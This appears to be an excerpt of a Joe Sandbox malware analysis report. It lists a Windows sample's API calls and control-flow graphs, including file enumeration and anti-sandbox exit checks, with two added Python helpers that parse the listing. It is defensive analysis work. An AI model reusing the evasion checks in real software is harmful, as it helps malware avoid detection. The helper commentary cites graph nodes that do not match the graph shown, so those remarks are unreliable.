                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 94f8111c7f352772e809de5bd02a6660419f09e73b211cd72e38acb7e55a4f41
                            • Instruction ID: d74664ec87a7ba5c395267d9eeb6be226c98c69adc82047ccf57b7fe8c19063e
                            • Opcode Fuzzy Hash: 94f8111c7f352772e809de5bd02a6660419f09e73b211cd72e38acb7e55a4f41
                            • Instruction Fuzzy Hash: C0319EB1D0820A9FCB04DFB889959EFBFBDEF58750F10416AE615F7650E2348A408BA1

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2793 6d4bc0-6d4bce -> 2794
                            • 2794 6d4bd0-6d4bd5 -> 2794, 2795
                            • 2795 6d4bd7-6d4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 6d2a20
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 006D4BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006D4C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006D4C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 006D4C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 006D4C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 498048f3e0dbb537b637885092e66d08fc09995ffcd85b208e660317e9842a53
                            • Instruction ID: a0d53c0aa9d07dc5394cc5f264e6c8d4ed6564ef4e79d7ee3c7e124ebade5e10
                            • Opcode Fuzzy Hash: 498048f3e0dbb537b637885092e66d08fc09995ffcd85b208e660317e9842a53
                            • Instruction Fuzzy Hash: B5011771D00218AFDB10DFA9E845B9EBBA9EB58320F00812AF954E7390EB7499058BD4

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2798 6d1030-6d1055 GetCurrentProcess VirtualAllocExNuma -> 2799, 2800
                            • 2799 6d105e-6d107b VirtualAlloc -> 2801, 2802
                            • 2800 6d1057-6d1058 ExitProcess
                            • 2801 6d107d-6d1080 -> 2802
                            • 2802 6d1082-6d1088 -> 2803, 2804
                            • 2803 6d108a-6d10ab VirtualFree -> 2804
                            • 2804 6d10b1-6d10b6
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D1046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 006D104D
                            • ExitProcess.KERNEL32 ref: 006D1058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006D106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006D10AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 3e059686ee8b2f7ca96c0a572b2c99032d8c872c12743fa2ac10bf35ed9ca558
                            • Instruction ID: 9f9706fbf384d91ec002fb87b75d7cf367016b175f0c066a19923274d9068754
                            • Opcode Fuzzy Hash: 3e059686ee8b2f7ca96c0a572b2c99032d8c872c12743fa2ac10bf35ed9ca558
                            • Instruction Fuzzy Hash: 2B01D1717842047FE7205A656C1AFAB77ADA785B05F208415F744EB380D9B1A9009664
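
The five API lines of this function describe two environment probes: a VirtualAllocExNuma call whose failure edge reaches ExitProcess, and a VirtualAlloc of 0x17C841C0 bytes that is released straight away. The function at 0x6D10C0 further down (GlobalMemoryStatusEx with an edge to ExitProcess) belongs to the same family. The Python below is an added analyst helper, not code from this report or from Joe Sandbox: it parses API lines in the report's own format, decodes the allocation flags against the winnt.h constants and flags both probes. The sample input is the listing copied from this page; reading the argument column of the GetCurrentProcess line as the already-pushed VirtualAllocExNuma parameters is our interpretation of the sandbox's stack snapshot, not something the report states.

```python
import re
from dataclasses import dataclass

# Constructed input: the "APIs" lines of the function at 0x6D1030, copied from this report.
REPORT_API_LINES = """\
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D1046
• VirtualAllocExNuma.KERNEL32(00000000), ref: 006D104D
• ExitProcess.KERNEL32 ref: 006D1058
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006D106C
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006D10AB
"""

# Win32 constants (winnt.h); only the bits that matter for VirtualAlloc*/VirtualFree.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY", 0x100: "PAGE_GUARD"}
MiB = 1024 * 1024

# "Name.MODULE(arg,arg,...), ref: 006D1046"; the parenthesised part is absent for calls
# the report lists without arguments (ExitProcess above).
LINE_RE = re.compile(r"^(?P<api>[^.\s]+)\.(?P<module>[A-Za-z0-9]+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # ints for 8-hex-digit values, raw strings otherwise ("?", "ERROR")
    ref: int     # address of the call site


def parse_api_lines(text):
    """Parse the report's 'APIs' bullets into ApiCall records, in listing order."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unrecognised API line: " + line)
        args = []
        for tok in (m.group("args") or "").split(","):
            tok = tok.strip()
            if tok:
                args.append(int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok)
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value, table):
    """Render a bitmask as 'NAME|NAME', keeping any unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) or "0"


def triage(calls):
    """Decode the allocation calls and flag the two sandbox probes visible in the listing."""
    findings, decoded = [], {}
    names = [c.api for c in calls]
    for i, c in enumerate(calls):
        if c.api == "VirtualAllocExNuma":
            # The report prints the stack as it looks at call time. GetCurrentProcess takes no
            # parameters, so the five values on the preceding GetCurrentProcess line are the
            # already-pushed VirtualAllocExNuma arguments (lpAddress, dwSize, flAllocationType,
            # flProtect, nndPreferred); its return value supplies hProcess. That reading of the
            # listing is our interpretation, not something the report states.
            prev = calls[i - 1] if i else None
            if prev and prev.api == "GetCurrentProcess" and len(prev.args) >= 5:
                _, size, alloc, prot, node = prev.args[:5]
                decoded[c.api] = (size, decode_flags(alloc, MEM_FLAGS),
                                  decode_flags(prot, PAGE_PROT), node)
            if "ExitProcess" in names[i + 1:]:
                findings.append("ExitProcess follows VirtualAllocExNuma: "
                                "the process bails out if the NUMA allocation API fails")
        elif c.api == "VirtualAlloc" and len(c.args) >= 4 and isinstance(c.args[1], int):
            size = c.args[1]
            decoded[c.api] = (size, decode_flags(c.args[2], MEM_FLAGS),
                              decode_flags(c.args[3], PAGE_PROT))
            freed = any(d.api == "VirtualFree" and len(d.args) >= 2 and d.args[1] == size
                        for d in calls[i + 1:])
            if size >= 256 * MiB and freed:
                findings.append(f"commits and immediately frees {size // MiB} MiB "
                                f"({size:#x} bytes): a probe for available memory")
    return findings, decoded


if __name__ == "__main__":
    found, dec = triage(parse_api_lines(REPORT_API_LINES))
    for api, values in dec.items():
        print(api, values)
    for f in found:
        print("finding:", f)
```

Run as a script it prints the decoded calls: dwSize 0x7D0 with MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE for the NUMA call, and 399,000,000 bytes (380 MiB) read-write for the second allocation. Treat the argument columns as hints rather than ground truth: the VirtualFree line shows MEM_RELEASE with a non-zero dwSize, which the API requires to be 0 for MEM_RELEASE, and an lpAddress of 0, so either the sample passes odd values or the snapshot is stale. Note also that the graph shows no ExitProcess edge after the VirtualAlloc, so whatever the sample does with the outcome of the 380 MiB commit happens outside this function.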

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2805 6eee90-6eeeb5 call 6d2930 -> 2808, 2809
                            • 2808 6eeec9-6eeecd call 6d6c40 -> 2812
                            • 2809 6eeeb7-6eeebf -> 2808, 2810
                            • 2810 6eeec1-6eeec3 lstrcpy -> 2808
                            • 2812 6eeed2-6eeee8 StrCmpCA -> 2813, 2814
                            • 2813 6eeeea-6eef02 call 6d2a20 call 6d2930 -> 2823, 2824
                            • 2814 6eef11-6eef18 call 6d2a20 -> 2820
                            • 2820 6eef20-6eef28 -> 2820, 2822
                            • 2822 6eef2a-6eef37 call 6d2930 -> 2824, 2831
                            • 2823 6eef04-6eef0c -> 2824, 2827
                            • 2824 6eef45-6eefa0 call 6d2a20 * 10
                            • 2827 6eef0e-6eef0f -> 2830
                            • 2830 6eef3e-6eef3f lstrcpy -> 2824
                            • 2831 6eef39 -> 2830
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 006EEEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 006EEF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 071f82ae81912ab5cb2ebf2bcf34aecf86d051635fa5b8ac20113306cc2bf578
                            • Instruction ID: 37ae860924aa0890d0c3dcd62b9a43be64501a720cf8edc46fa8610f7a5cef5b
                            • Opcode Fuzzy Hash: 071f82ae81912ab5cb2ebf2bcf34aecf86d051635fa5b8ac20113306cc2bf578
                            • Instruction Fuzzy Hash: CF2123B0A212569FCB71FF7ADC55B9A37A5EF24300F04552DB84ADB352DA31EC018794

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2886 6d10c0-6d10cb -> 2887
                            • 2887 6d10d0-6d10dc -> 2889
                            • 2889 6d10de-6d10f3 GlobalMemoryStatusEx -> 2890, 2891
                            • 2890 6d10f5-6d1106 -> 2892, 2893
                            • 2891 6d1112-6d1114 ExitProcess
                            • 2892 6d1108 -> 2891, 2894
                            • 2893 6d111a-6d111d
                            • 2894 6d110a-6d1110 -> 2891, 2893
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 10029b1fdc14666da23153847e06f4b389ab1e98b43a71d877d7e2af9f466fd0
                            • Instruction ID: 1b167efc091cc292d0f6446d435465795e2f551198e786b95ff2dd1f7928dc71
                            • Opcode Fuzzy Hash: 10029b1fdc14666da23153847e06f4b389ab1e98b43a71d877d7e2af9f466fd0
                            • Instruction Fuzzy Hash: 37F02770A182446BEB107A64DC0A32DF7DAEB53350F10492BDEDACA381E6B0C8809167
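
Every control_flow_graph entry in this report follows one pattern: node id, address range, API names or internal call targets, and a->b edges. The Python below is an added helper, not part of the report or of Joe Sandbox, that parses that pattern and answers the two questions an analyst asks of these graphs: which API call guards each ExitProcess block, and which block is the dispatcher. The two sample graphs are the ones for 0x6D1030 and 0x6D10C0 copied from this page; the token heuristics (short decimal node ids, six-digit hex addresses, "call <addr>" and "* <n>" annotations) are assumptions drawn from the graphs on this page.

```python
import re
from collections import defaultdict

# Constructed input: two control_flow_graph lines copied from this report
# (the functions at 0x6D1030 and 0x6D10C0).
CFG_6D1030 = ("control_flow_graph 2798 6d1030-6d1055 GetCurrentProcess VirtualAllocExNuma "
              "2799 6d105e-6d107b VirtualAlloc 2798->2799 2800 6d1057-6d1058 ExitProcess "
              "2798->2800 2801 6d107d-6d1080 2799->2801 2802 6d1082-6d1088 2799->2802 "
              "2801->2802 2803 6d108a-6d10ab VirtualFree 2802->2803 2804 6d10b1-6d10b6 "
              "2802->2804 2803->2804")
CFG_6D10C0 = ("control_flow_graph 2886 6d10c0-6d10cb 2887 6d10d0-6d10dc 2886->2887 "
              "2889 6d10de-6d10f3 GlobalMemoryStatusEx 2887->2889 2890 6d10f5-6d1106 "
              "2889->2890 2891 6d1112-6d1114 ExitProcess 2889->2891 2892 6d1108 2890->2892 "
              "2893 6d111a-6d111d 2890->2893 2892->2891 2894 6d110a-6d1110 2892->2894 "
              "2894->2891 2894->2893")

# Heuristic taken from the graphs on this page: node ids are short decimal numbers and
# block addresses are 6-digit hex ranges, so a decimal token followed by a long hex token
# starts a new block. Everything else up to the next block or edge is the block's label.
ADDR_RE = re.compile(r"^[0-9a-f]{5,}(-[0-9a-f]{5,})?$")


class Cfg:
    def __init__(self):
        self.blocks = {}                  # node id -> address range
        self.labels = defaultdict(list)   # node id -> label tokens (APIs, "call <addr>", "* <n>")
        self.succ = defaultdict(list)
        self.pred = defaultdict(list)

    def apis(self, node):
        """API names in a block, skipping 'call <addr>' (internal call) and '* <n>' (repeat count)."""
        out, toks, i = [], self.labels[node], 0
        while i < len(toks):
            if toks[i] in ("call", "*"):
                i += 2
                continue
            out.append(toks[i])
            i += 1
        return out

    def blocks_calling(self, api):
        return sorted(n for n in self.blocks if api in self.apis(n))

    def guarding_apis(self, node):
        """APIs of the nearest predecessor blocks that call anything, walking back through
        API-free blocks: the check whose outcome sends control into `node`."""
        seen, found, stack = set(), set(), list(self.pred[node])
        while stack:
            p = stack.pop()
            if p in seen:
                continue
            seen.add(p)
            if self.apis(p):
                found.update(self.apis(p))
            else:
                stack.extend(self.pred[p])
        return found

    def dispatch_block(self):
        """The block with the most successors (in this sample, a switch over compared strings)."""
        return max(self.succ, key=lambda n: len(self.succ[n]))


def parse_cfg(line):
    g = Cfg()
    toks = line.split()
    i = 1 if toks and toks[0] == "control_flow_graph" else 0
    cur = None
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            a, b = t.split("->")
            g.succ[a].append(b)
            g.pred[b].append(a)
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = t
            g.blocks[cur] = toks[i + 1]
            i += 1
        elif cur is not None:
            g.labels[cur].append(t)
        i += 1
    return g


def exit_guards(line):
    """For every ExitProcess block in the graph, the APIs checked right before it."""
    g = parse_cfg(line)
    return {n: sorted(g.guarding_apis(n)) for n in g.blocks_calling("ExitProcess")}


if __name__ == "__main__":
    for name, cfg in (("6D1030", CFG_6D1030), ("6D10C0", CFG_6D10C0)):
        print(name, "exit guards:", exit_guards(cfg))
```

On the two sample graphs the exit blocks are guarded by GetCurrentProcess/VirtualAllocExNuma and by GlobalMemoryStatusEx respectively. Fed the 0x6E8CA0 graph higher up, dispatch_block() returns node 2729, the block that fans out into the thirteen StrCmpCA and lstrlen comparison blocks, and guarding_apis("2723") returns {"StrCmpCA"}: that function exits when the first string comparison at its entry fails, which is the comparison to revisit alongside the "block" string listed for it under Similarity.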

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2895 6e8c88-6e8cc4 StrCmpCA -> 2898, 2899
                            • 2898 6e8ccd-6e8ce6 -> 2901, 2902
                            • 2899 6e8cc6-6e8cc7 ExitProcess
                            • 2901 6e8cec-6e8cf1 -> 2903
                            • 2902 6e8ee2-6e8eef call 6d2a20
                            • 2903 6e8cf6-6e8cf9 -> 2905, 2906
                            • 2905 6e8cff -> 2908, 2909, 2910, 2911, 2912, 2913, 2914, 2915, 2916, 2917, 2918, 2919, 2920
                            • 2906 6e8ec3-6e8edc -> 2902, 2942
                            • 2908 6e8e6f-6e8e7d StrCmpCA -> 2906, 2933
                            • 2909 6e8e88-6e8e9a lstrlen -> 2934, 2935
                            • 2910 6e8d06-6e8d15 lstrlen -> 2929, 2930
                            • 2911 6e8d84-6e8d92 StrCmpCA -> 2906, 2924
                            • 2912 6e8da4-6e8db8 StrCmpCA -> 2906
                            • 2913 6e8dbd-6e8dcb StrCmpCA -> 2906, 2925
                            • 2914 6e8ddd-6e8deb StrCmpCA -> 2906, 2926
                            • 2915 6e8dfd-6e8e0b StrCmpCA -> 2906, 2927
                            • 2916 6e8e1d-6e8e2b StrCmpCA -> 2906, 2928
                            • 2917 6e8e3d-6e8e4b StrCmpCA -> 2906, 2931
                            • 2918 6e8d5a-6e8d69 lstrlen -> 2921, 2922
                            • 2919 6e8e56-6e8e64 StrCmpCA -> 2906, 2932
                            • 2920 6e8d30-6e8d3f lstrlen -> 2936, 2937
                            • 2921 6e8d6b-6e8d70 call 6d2a20 -> 2922
                            • 2922 6e8d73-6e8d7f call 6d2930 -> 2955
                            • 2924 6e8d98-6e8d9f -> 2906
                            • 2925 6e8dd1-6e8dd8 -> 2906
                            • 2926 6e8df1-6e8df8 -> 2906
                            • 2927 6e8e11-6e8e18 -> 2906
                            • 2928 6e8e31-6e8e38 -> 2906
                            • 2929 6e8d1f-6e8d2b call 6d2930 -> 2955
                            • 2930 6e8d17-6e8d1c call 6d2a20 -> 2929
                            • 2931 6e8e4d-6e8e54 -> 2906
                            • 2932 6e8e66-6e8e6d -> 2906
                            • 2933 6e8e7f-6e8e86 -> 2906
                            • 2934 6e8e9c-6e8ea1 call 6d2a20 -> 2935
                            • 2935 6e8ea4-6e8eb0 call 6d2930 -> 2955
                            • 2936 6e8d49-6e8d55 call 6d2930 -> 2955
                            • 2937 6e8d41-6e8d46 call 6d2a20 -> 2936
                            • 2942 6e8cf3 -> 2903
                            • 2955 6e8eb3-6e8eb5 -> 2906, 2956
                            • 2956 6e8eb7-6e8eb9 -> 2906, 2957
                            • 2957 6e8ebb-6e8ebd lstrcpy -> 2906
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 68f2fe4ee2f27c312bc201cfe2c33e3193b57482ed3e3a7a2975304de71cac4f
                            • Instruction ID: fdbdba755fad8fb14ab9a70032d8d7d66ad88de38ea92715a37b3199aa97e415
                            • Opcode Fuzzy Hash: 68f2fe4ee2f27c312bc201cfe2c33e3193b57482ed3e3a7a2975304de71cac4f
                            • Instruction Fuzzy Hash: 12E0D8A0114349EFD7206BB5CC549D7BBBCEF84704B00882CBA9A97252EA74AD00C354

                            Control-flow Graph (legend: Executed / Not Executed)
                            • Block 6f2ad0-6f2b22: calls GetProcessHeap, RtlAllocateHeap, GetComputerNameA; branches to block 6f2b44-6f2b59 and to block 6f2b24-6f2b36
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006F2AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 006F2B1A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 2a41d32a0cbfa7895eb237b076561c9c417bb4cb889fcc23e47055513adb72c1
                            • Instruction ID: 3dcb05bd867a79aeb217b54287a720a34aabd961ce117640b2d8dbd0fc192883
                            • Opcode Fuzzy Hash: 2a41d32a0cbfa7895eb237b076561c9c417bb4cb889fcc23e47055513adb72c1
                            • Instruction Fuzzy Hash: 4201D1B2A44208AFD710DF99EC45BAEF7B8F745B21F00026AFA19E3780D77419048BA1
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E23D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E23F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2402
                            • lstrlen.KERNEL32(\*.*), ref: 006E240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006E2436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E2486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: da554c58561651b24ab3af266b08d6861aa9bcd9453f5a73bd6acf63b989766d
                            • Instruction ID: 71d0c0d10da441489e6040fffde8aef0ebe2a33a4e175492261fb8fdf13e5bfb
                            • Opcode Fuzzy Hash: da554c58561651b24ab3af266b08d6861aa9bcd9453f5a73bd6acf63b989766d
                            • Instruction Fuzzy Hash: A3A29E71A163679FDB61AF76CCA8AAE77BBAF14300F044129B84997351DB34DD018B90
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D16E2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D176C
                            • lstrcat.KERNEL32(00000000), ref: 006D1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D17F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1875
                            • lstrcat.KERNEL32(00000000), ref: 006D187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D18AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D18FE
                            • lstrlen.KERNEL32(00701794), ref: 006D1909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1929
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1966
                            • lstrlen.KERNEL32(\*.*), ref: 006D1971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006D199A
                              • Part of subcall function 006F4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 006F406D
                              • Part of subcall function 006F4040: lstrcpy.KERNEL32(00000000,?), ref: 006F40A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D19C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1A16
                            • lstrlen.KERNEL32(00701794), ref: 006D1A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A41
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1A81
                            • lstrlen.KERNEL32(00701794), ref: 006D1A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1AAC
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006D1B45
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006D1B70
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006D1B8A
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1C03
                            • lstrlen.KERNEL32(00701794), ref: 006D1C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C31
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1C74
                            • lstrlen.KERNEL32(00701794), ref: 006D1C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CA2
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1CAE
                            • lstrlen.KERNEL32(?), ref: 006D1CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1CE9
                            • lstrlen.KERNEL32(00701794), ref: 006D1CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1D14
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1DEB
                            • lstrlen.KERNEL32(00701794), ref: 006D1DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E19
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1E56
                            • lstrlen.KERNEL32(00701794), ref: 006D1E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1E81
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1E8D
                            • lstrlen.KERNEL32(?), ref: 006D1E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006D1F45
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1F9F
                            • lstrlen.KERNEL32(010188F8), ref: 006D1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1FE3
                            • lstrlen.KERNEL32(00701794), ref: 006D1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D200E
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D204D
                            • lstrlen.KERNEL32(00701794), ref: 006D2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2075
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D2081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: db778462b66e4223e21e4982a0523fce3f529d57b3bdf05f1bfb4ff83fe9ebc8
                            • Instruction ID: 3bc270bddb38c65162cb9461953f99acb37a315c61e523a1a9795d99fb3ee760
                            • Opcode Fuzzy Hash: db778462b66e4223e21e4982a0523fce3f529d57b3bdf05f1bfb4ff83fe9ebc8
